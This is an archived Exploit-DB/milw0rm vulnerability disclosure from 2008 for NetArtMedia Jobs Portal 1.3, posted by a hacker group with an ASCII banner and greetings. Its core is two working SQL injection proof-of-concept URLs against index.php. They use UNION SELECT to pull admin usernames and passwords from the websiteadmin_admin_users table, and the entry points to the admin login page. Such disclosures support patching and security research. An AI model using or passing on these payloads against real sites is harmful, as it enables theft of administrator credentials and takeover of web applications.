Netartmedia Jobs Portal 1.3 - Multiple SQL Injections

EDB-ID:

6517


Platform:

PHP

Published:

2008-09-21

######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
################################ !R4Q!4N H4CK3R  ###################################
NetArtMedia Jobs Portal 1.3  Multiple Sql Injection Vulnerabilities
Website    : http://www.netartmedia.net
Founded By : Encrypt3d.M!nd
Home Page  : http://encrypt3d.blogspot.com

# Remote Sql Injection(s) :
Affected File(s) :
index.php
 
PoC:
/index.php?mod=search&job=-666 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14 from websiteadmin_admin_users
/index.php?page_id=-1&news_id=-666 union select 1,2,username,password,5,6 from websiteadmin_admin_users
Administration Panel:
/ADMIN/login.php

# Greetz:
MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
KoRn The Dog,MiNi-SpIder,All My Friends

The EnD :D

# milw0rm.com [2008-09-21]